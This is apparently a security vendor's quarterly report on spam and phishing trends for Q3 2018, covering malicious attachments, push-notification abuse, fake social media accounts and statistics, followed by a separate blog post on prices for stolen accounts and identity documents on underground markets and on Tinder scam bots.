The amount demanded by the ransomers ranged from a few hundred to several thousand dollars. To collect the payments, different Bitcoin wallets were used, which changed from mailing to mailing. In July, 17 transactions worth more than 3 BTC ($18,000 at the then exchange rate) were made to one of such wallets.
Transactions to scammers’ Bitcoin wallets
Also in Q3, we detected a malicious spam campaign aimed at corporate users. The main target was passwords (for browsers, instant messengers, email and FTP clients, cryptocurrency wallets, etc.). The cybercriminals attempted to infect victim computers with Loki Bot malware, concealing it in ISO files attached to messages. The latter were made to look like business correspondence or notifications from well-to-do companies.
Malicious spam attacks against the banking sector
The owners of the Necurs botnet, which in Q2 was caught sending malicious emails with IQY (Microsoft Excel Web Query) attachments, turned their attention to the banking sector and, like in Q2, used a non-typical file format for spam, this time PUB (Microsoft Publisher). Messages were sent to the email addresses of credit institutions in different countries, and the PUB file attachments contained Trojan loaders for downloading executable files (detected as Backdoor.Win32.RA-based) onto victim computers.
We observed that the owners of Necurs are making increasing use of various techniques to bypass security solutions and send malicious spam containing attachments with non-typical extensions so as not to arouse users’ suspicion.
New iPhone launch
Late Q3 saw the release of Apple’s latest gizmo. Unsurprisingly, it coincided with a spike in email spam from Chinese “companies” offering Apple accessories and replica gadgets. Links in such messages typically point to a recently created, generic online store. Needless to say, having transferred funds to such one-day websites, you lose your money and your goods are not arriving.
The release also went hand in hand with a slight rise in both the number of phishing schemes exploiting Apple (and its services) and messages with malicious attachments:
Classic pharma spam in a new guise
Spammers are constantly looking for ways to get round mail filters and increase the “deliverability” of their offers. To do so, they try to fabricate emails (both the contents and technical aspects) that look like messages from well-known companies and services. For example, they copy the layout of banking and other notifications and add bona fide headers in the fields that the user is sure to see.
Such techniques, typical of phishing and malicious campaigns, are being used more often in “classic spam” – for example, in messages offering prohibited medicines. For instance, this past quarter we detected messages disguised as notifications from major social networks, including LinkedIn. The messages contained a phoney link that we expected to point to a phishing form asking for personal data, but instead took us to a drug store.
This new approach is taken due to the fact that this type of spam in its traditional form has long been detectable by anti-spam solutions, so spammers started using disguises. We expect this trend to pick up steam.
Since the start of the academic year, scammers’ interest in gaining access to accounts on university websites has risen. We registered attacks against 131 universities in 16 countries worldwide. Cybercriminals want to get their hands on both personal data and academic research.
Fake login pages to personal accounts on university websites
To harvest personal data, attackers exploit the job-hunting efforts. Pages with application forms lure victims with tempting offers of careers in a big-name company, large salary, and the like.
This quarter we are again focused on ways in which phishing and other illegitimate content is distributed by cybercriminals. But this time we also want to draw attention to methods that are gaining popularity and being actively exploited by attackers.
Some browsers make it possible for websites to send notifications to users (for example, Push API in Chrome), and this technology has not gone unnoticed by cybercriminals. It is mainly deployed by websites that collaborate with various partner networks. With the aid of pop-up notifications, users are lured onto “partner” sites, where they are prompted to enter, for example, personal data. The owners of the resource receive a reward for every user they process.
By default, Chrome requests permission to enable notifications for each individual site, and so as to nudge the user into making an affirmative decision, the attackers state that the page cannot continue loading without a little click on the Allow button.
Having given the site permission to display notifications, many users simply forget about it, so when a pop-up message appears on the screen, they don’t always understand where it came from.
Notifications are tailored to the user’s location and displayed in the appropriate language
The danger is that notifications can appear when the user is visiting a trusted resource. This can mislead the victim as regards the source of the message: everything seems to suggest it came from the trusted site currently open. The user might see, for instance, a “notification” about a funds transfer, giveaway, or tasty offer. They all generally lead to phishing sites, online casinos, or sites with fake giveaways and paid subscriptions:
Examples of sites that open when users click on a notification
Clicking on a notification often leads to an online gift card generator, which we covered earlier in the quarter (it also works in the opposite direction: the resource may prompt to enable push notifications). Such generators offer visitors the chance to generate free gift card codes for popular online stores. The catch is that in order to get the generated codes, the visitor needs to prove their humanness by following a special link. Instead of receiving a code, the user is sent on a voyage through a long chain of partner sites with invitations to take part in giveaways, fill out forms, download stuff, sign up for paid SMS mailings, and much more.
The use of media resources is a rather uncommon, yet effective way of distributing fraudulent content. This point is illustrated by the story of the quite popular WEX cryptocurrency exchange, which prior to 2017 went by the name of BTC-E. In August 2018, fake news was inserted into thematic “third tier” Russian media saying that, due to internal problems, the exchange was changing its domain name to wex.ac:
The wex.nz administration soon tweeted (its tweets are published on the exchange’s home page) that wex.ac was just another imitator and warned users about transferring funds.
But that did not stop the scammers, who released more news about the exchange moving to a new domain. This time to the .sc zone:
Among the social media platforms used by scammers to distribute content, Instagram warrants a special mention. Only relatively recently have cybercriminals started paying attention to it. In Q3 2018, we came across many fake US Internal Revenue Service user accounts in this social network, as well as many others purporting to be an official account of one of the most widely-used Brazilian banks.
Fake IRS accounts on Instagram
Scammers not only create fakes, but seek access to popular accounts: August this year saw a wave of account hacking sweep through the social network. We observed accounts changing owners as a result of phishing attacks with “account verification” prompts – users themselves delivered their credentials on a plate in the hope of getting the cherished blue tick.
Back when scammers offered to “verify” accounts, there was no such function in the social network: the administration itself decided whom to award the sacred “badge.” Now it is possible to apply for one through the account settings.
Proportion of spam in email traffic
Proportion of spam in global email traffic, Q2 and Q3 2018 (download)
In Q3 2018, the largest share of spam was recorded in August (53.54%). The average percentage of spam in global mail traffic was 52.54%, up 2.88 p.p. against the previous reporting period.
Sources of spam by country
Sources of spam by country, Q3 2018 (download)
The three leading source countries for spam in Q3 were the same as in Q2 2018: China is in first place (13.47%), followed by the USA (10.89%) and Germany (10.37%). Fourth place goes to Brazil (6.33%), and fifth to Vietnam (4.41%). Argentina (2.64%) rounds off the Top 10.
Spam email size
Spam email size, Q2 and Q3 2018 (download)
In Q3 2018, the share of very small emails (up to 2 KB) in spam fell by 5.81 p.p. to 73.36%. The percentage of emails sized 5-10 KB increased slightly compared to Q2 (+0.76 p.p.) and amounted to 6.32%. Meanwhile, the proportion of 10-20 KB emails dropped by 1.21 p.p. to 2.47%. The share of 20-50 KB spam messages remained virtually unchanged, climbing a mere 0.49 p.p. to 3.17%.
Malicious attachments: malware families
Top 10 malicious families in mail traffic, Q3 2018 (download)
According to the results of Q3 2018, still the most common malware in mail traffic were objects assigned the verdict Exploit.Win32.CVE-2017-11882, adding 0.76 p.p. since the last quarter (11.11%). The Backdoor.Win32.Androm bot was encountered more frequently than in the previous quarter and ranked second (7.85%), while Trojan-PSW.Win32.Farei dropped to third place (5.77%). Fourth and fifth places were taken by Worm.Win32.WBVB and Backdoor.Java.QRat, respectively.
Countries targeted by malicious mailshots
Countries targeted by malicious mailshots, Q3 2018 (download)
The Top 3 countries by number of Mail Anti-Virus triggers in Q3 remain unchanged since the start of the year: Germany took first place (9.83%), with Russia in second (6.61%) and the UK in third (6.41%). They were followed by Italy in fourth (5.76%) and Vietnam in fifth (5.53%).
In Q3 2018, the Anti-Phishing system prevented 137,382,124 attempts to direct users to scam websites. 12.1% of all Kaspersky Lab users worldwide were subject to attack.
Geography of attacks
The country with the highest percentage of users attacked by phishing in Q3 2018 was Guatemala with 18.97% (+8.56 p.p.).
Geography of phishing attacks, Q3 2018 (download)
Q2’s leader Brazil dropped to second place, with 18.62% of users in this country attacked during the reporting period, up 3.11 p.p. compared to Q2. Third and fourth places went to Spain (17.51%) and Venezuela (16.75%), with Portugal rounding off the Top 5 (16.01%).
* Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country
Organizations under attack
The rating of categories of organizations attacked by phishers is based on triggers of the Anti-Phishing component on user computers. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.
As in the previous quarter, the Global Internet Portals category was in first place, bumping its share up to 32.27% (+7.27 p.p.).
Distribution of organizations whose users were attacked by phishers, by category, Q3 2018 (download)
Only organizations that can be combined into a general Finance category were attacked more than global Internet portals. This provisional category accounted for 34.67% of all attacks (-1.03 p.p.): banks and payment systems had respective shares of 18.26% and 9.85%; only online stores (6.56%) had to concede fourth place to IT companies (6.91%).
In Q3 2018, the average share of spam in global mail traffic rose by 2.88 p.p. to 52.54%, and the Anti-Phishing system prevented more than 137 million redirects to phishing sites, up 30 million against the previous reporting period.
Spammers and phishers continue to exploit big news stories. This quarter, for instance, great play was made of the release of the new iPhone. The search for channels to distribute fraudulent content also continued. Alongside an uptick in Instagram activity, we spotted fake notifications from websites and the spreading of fake news through media resources.
A separate mention should go to the expanding geography of ransomware spam, featuring the use of victims’ real personal data.
Hey there! How much are you worth?
Kaspersky Have you ever stopped to think just how much your life is worth? I mean really think about it. For instance, let’s say you wanted to sell everything you have – your house, your car, your job, your private life, photos and home movies from your childhood, your accounts on various social media, your medical history and so on – how much would you ask for it all?
I thought about this myself and just the thought that someone else would be able to, for example, read the personal things I’ve written to friends, family and lovers on Facebook made me realize that those things are priceless. The same goes for someone getting access to my email and basically having the power to reset all my passwords for all the accounts I’ve registered using that email.
In the real non-digital world there are lots of insurance policies that cover things if they get damaged or stolen. If someone steals my car or I break my TV, I can replace them if they were insured. We don’t really have that option in the digital world, and our digital life contains some very personal and sentimental information. The big difference is that our digital lives can never be erased – what we’ve said or written, pictures we’ve sent, or orders we’ve made are basically stored forever in the hands of the service providers.
I decided to investigate the black market and see what kind of information is being sold there. We all know that you can buy drugs, weapons and stolen goods there, but you can also buy online identities. How much do you think your online identity is worth?
When investigating hacked accounts from popular services it’s almost impossible to compile valid data because there are so many black-market vendors selling this stuff. It is also difficult to verify the uniqueness of the data being sold. But one thing is certain – this is the most popular type of data being sold on the black market. When talking about data from popular services, I’m referring to things like stolen social media accounts, banking details, remote access to servers or desktops and even data from popular services like Uber, Netflix, Spotify and tons of gaming websites (Steam, PlayStation Network, etc.), dating apps, porn websites.
The most common way to steal this data is via phishing campaigns or by exploiting a web-related vulnerability such as an SQL injection vulnerability. The password dumps contain an email and password combination for the hacked services, but as we know most people reuse their passwords. So, even if a simple website has been hacked, the attackers might get access to accounts on other platforms by using the same email and password combination.
These kinds of attacks are not very sophisticated, but they are very effective. It also shows that cybercriminals are making money from hackers and hacktivists; the people selling these accounts are most likely not the people who hacked and distributed the password dump.
The price for these hacked accounts is very cheap, with most selling for about $1 per account, and if you buy in bulk, you’ll get them even cheaper.
Some vendors even give a lifetime warranty, so if one account stops working, you receive a new account for free. For example, below is a screenshot that shows a vendor selling Netflix accounts.
100 000 email and password combinations
250 000 email and password combinations
Passports and identity papers
When lurking around underground marketplaces I saw a lot of other information being traded, such as fake passports, driving licenses and ID cards/scans. This is where things get a bit more serious – most of the identity papers are not stolen, but they can be used to cause problems in the non-digital world.
People can use your identity with a fake ID card to acquire, for example, phone subscriptions, open bank accounts and so on.
Below is a screenshot of a person selling a registered Swedish passport, and the price is $4000. The same vendor was offering passports from almost all European countries.
Most of the items being sold in the underground marketplaces are not new to me; they are all things the industry has been talking about for a very long time. What was interesting was the fact that stolen or fake invoices and other papers/scans such as utility bills were being sold.
People actually steal other people’s mail and collect invoices, for example, which are then used to scam other people. They will collect and organize these invoices by industry and country. The vendors then sell these scans as part of a scammer toolbox.
A scammer can use these scans to target victims in specific countries and even narrow their attacks down to gender, age and industry.
During the research I got to thinking about a friend’s (Inbar Raz) research on Tinder bots and, through my research, I managed to find links between stolen accounts and Tinder bots. These bots are used to earn even more money from stolen accounts. So, the accounts are not just sold on the black market, they are also used in other cybercriminal activities.
What’s interesting about the fake Tinder profiles is that they have the following characteristics in common that make them easy to identify:
Lots of matches all at once.
Most of the women look like super models.
No job title or education info.
Stolen Instagram pictures/images but with info stolen from Facebook accounts.
Scripted chat messages.
Most of the bots that I’ve researched are related to traffic redirection, clickbait, spam and things like that. So far, I haven’t seen any malware – most of the bots will try to involve you in other crime or to steal your data. Here’s an example of what it might look like.
The first step is that you’re matched with the bot. The bot doesn’t always contact you directly, but waits for you to interact with it before it replies. In some cases the introduction is scripted with some text about how it wants to show you nude photos or something similar and then it posts a link.
When you click on the link you go through several websites redirecting you in a chain. This chain does a lot of things, such as place cookies in your browser, enumerate your settings such as location, browser version and type and probably a lot more. This is done so that when you end up at the landing page they know which page to serve you. In my case, I came from a Swedish IP and the website I was offered was obviously in Swedish, which indicates that they are targeting victims globally.
These websites always have statements and quotes from other users. Most of the information used, including profile photos, name and age, is also taken from stolen accounts. The quote itself is obviously fake, but this approach looks very professional.